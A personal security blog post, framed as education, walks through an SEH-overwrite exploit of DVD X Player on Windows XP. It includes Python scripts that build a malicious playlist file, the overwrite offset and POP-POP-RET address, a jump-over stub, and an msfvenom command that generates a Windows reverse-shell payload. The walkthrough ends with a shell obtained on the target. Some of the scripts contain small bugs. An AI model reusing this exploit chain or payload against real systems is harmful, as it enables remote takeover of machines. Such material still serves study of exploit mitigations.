Skip to main content

Breaking code: Exploit Bypass SEH windows (▀̿Ĺ̯▀̿ ̿) (day 41)


Disclaimer: This post only for education only ! not to cause any destruction on any living system. Be smart!

In the previous post about exploit development, we see that we able to take control of an FTP server by causing a buffer overflow in the stack register of the program but unfortunately this case is often considered as too good to be true and not likely to happen in today's program since there are many defense mechanisms that have already been equipped to circumvent our exploit.

One of defense we are going to talk about today is SEH (Structure Exception Handler) *TA TA taaaaaaaaaaaaaaa


what is SEH?

is a mechanism used by the Windows operating system for handling software and hardware exception. To all of you readers who already learn programming exception can be used in the following way:

(in python):

try:
              //create a code
except:
              //if some error occurred, do this !

an exception is very good at handling an error in the program, so the program itself knows what to do rather than crashing.

an exception can also be used to prevent buffer overflow

in the Windows operating system, SEH implemented by chaining them together like a linked list. It starts when program experiences crash and the OS will go through the SEH chain one by one to see which one is suitable to handle the crash. The overall can be depicted in the following diagram:


reference: https://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/

Unfortunately:

yeah! unfortunately, SEH is not a 100% solution to an overflow attack, an attacker can bypass the SEH check and redirect the execution of the program to execute the shellcode. Let's implement this in a real-life scenario.

note: this post is based on the fuzzy sec blog (http://www.fuzzysecurity.com/tutorials/expDev/3.html)and not fully come from me, I only recreate the POC in a more detail manner since when I try executed this I'm kinda confused to follow the instruction since it's lack of some certain detail in the process.

our target is going to be: https://www.exploit-db.co/apps/cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe

the os is going to be windows XP pack 3 equipped with immunity debugger

Implementation:

load the DVD player program into immunity debugger


Press the play button so it will start executing the program, first, we need to craft some malicious file that will crash the program.



 You can check SEH feature by going to the "view" at the top of toolbar and click the "SEH chain"

This will show the list of SEH in the program and as you can see there is only one entry and if we trace the register it says "SE handler"



Use the following python code to generate malicious .plf (playlist file) program

 filename="evil.plf"

buffer = "A"*2000
 
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

execute the program it will generate an "evil.plf" file in your directory. Load the file into your DVD X player


once it loads it will crash the program and take a look at the EIP it contains "A" characters


This is actually really similar to the previous post but here we can check what happens to our SEH. Try to type "shift + f9" to pass the exception and check the SEH chain (you can use this couple of times this will not affect the program).


As you can see that the SEH chain has been corrupted with our file what this means is that we are able to overwrite the SEH register by our payload. Let's try to create a random pattern so we know how much offset we need to overwrite.


put the random pattern into our script:

filename="evil.plf"

#buffer = "A"*2000
buffer = <insert random pattern>
 
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

execute the python script again and load it into the DVD x player (don't forget to re-run the app again since we just crashed it earlier)


now we need to run the mona script to find the offset of the SEH chain (type !mona findmsp):


cool! so we need to edit the 608 th offset to rewrite the value of SEH. Let's test it with the following script:

filename="evil.plf"

buffer = "A"*608
SEH= "B" * 4
buffer2 = "C" * 1000 
 
payload = buffer + SEH + buffer2

textfile = open(payload , 'w')
textfile.write(buffer)
textfile.close()

Run the script again and load it to the program, click shift + f9 to pass the exception and check the SEH chain.


great! we are able to overwrite the right offset to edit the SEH. Right now we can fill the offset value to redirect the program into "next SEH", remember I told you that SEH chained together like a linked list and if the error is not matched with the current exception it will move the "next SEH" right? so all we have to do is just redirect the SEH using POP+POP+RET instruction to the next SEH that contains the value of our shellcode.

this workflow can be breakdown with the following diagram:


POP+POP+RET, would pop the first two entries off of the stack and the return instruction would load back again to next SEH

we can find the "POP+POP+RET" using mona, type: !mona seh


you can use any of the listed address, but I suggest you use the address that has EPG.dll attach to it so the exploit is going to be universal since it is a common library.

updated our script to become like this:


filename="evil.plf"

buffer = "A"*608
next_seh= "B" * 4
seh = "\x19\x76\x66\x66"
buffer2 = "C" * 1000 
 
payload = buffer + next_seh + seh + buffer2

textfile = open(payload , 'w')
textfile.write(buffer)
textfile.close()


to make sure we hit the right address of "POP+POP+RET" put the breakpoint in 0x66667619 and run the program with the new file.


cool! now once you hit the breakpoint try to step through the code using "shift + f7" it will lead you to the "next SEH" variable in conclusion POP + POP + RET instruction is just making program EIP move backward 4 bytes. Now all we have to do is to figure out what value needs to be filled inside the next SEH register

we can just point it to our shellcode which is next after the SEH variable. I use \xEB\x06\x90\x90 to jump to the next 8 bytes.



now our final script is going to be like this:


to generate the shellcode I used the msfpayload with the following specification of parameters.

~#msfvenom --payload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=9090 -i 1 --arch x86 --platform windows -b \x00\x0a\x0d\x1a --format python

run it and we got another evil.plf again now try to load it into DVD x player and don't forget to open a port to receiver our reverse shell


Cool! we got our reverse shell from the windows XP

I hope you enjoy this post

Reference:

https://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/







Labels:

Comments

Post a Comment

Popular posts from this blog

Having fun analyzing nginx log to find malicious attacker in the net (ง'̀-'́)ง (day 37)

  What makes you sleepless at night? is it because of a ghost or scary stories? is it because you have an important meeting tomorrow? or is it because you have an exam? For me, what keeps me up all night is that I keep thinking about what happens to a website that I just created, is it safe from an attacker (certainly not) or did I missing some security adjustments that lead to vulnerability? well I'm not the best secure programmer in the world, I'm still learning and there is a big possibility that I can make a mistake but for me, a mistake can be a valuable investment to myself or yourself to be better so from this idea, I want to know more about what attackers casually do when attacking a website. Here in this post, I'm going to show you how I analyzed attack to the website that I have permission to design and also some interesting findings that I could get from the analysis Background: All of this analysis comes from the traffic that is targeted to th...
Post a Comment
Read More »

Utilize Pwntools for crafting ROP chain :') (day 69)

who doesn't like pwntools? it is a very versatile tool and can be customized according to our need using the python script but did you need to know that pwntools itself can help us to automatically craft a rop chain for us? so in this post, I will show you how to make rop chain less painful and make pwntools do all the heavy lifting. To demonstrate this I will use the binary challenge callme 64 bit from ropemporium link: https://ropemporium.com/challenge/callme.html Crashing the app: Like any other exploitation process, we need to crash the program by generating a long string pattern to determine the offset. based on the information from the above figure we can see that we required to provide 40 bytes of offset Fun stuff: now this where the fun stuff began write the following python script: as in the guideline of the challenged said we need to chain the function call by first to call the callme_one function, callme_two function and then callme_three funct...
Post a Comment
Read More »

Bypassing stack canaries protection :') (day 51)

In my previous blogs, I show you guys how to bypass some common protection usually used in Linux binary such as NX and ASLR but this time we are going to take it to the next level we are going to talk about protection employ in the modern Linux OS which is "The Canaries" and how to bypass it. note: this post was not originally mined it was inspired by the following resources https://ctf-wiki.github.io/ctf-wiki/pwn/linux/mitigation/canary/ (Credit goes to the author) we are going to start this post about what is stack canaries and types of different implementation of it then move to the implementation about how to bypass this protection. We are going to focus on "leak canaries" technique What is stack canary: In layman terms, canaries are just another protection mechanism to prevent stack overflow implemented by appending 4/8 bytes value (depend on the architecture) into the stack when a function is entered. When the function is at the end of its exec...
Post a Comment
Read More »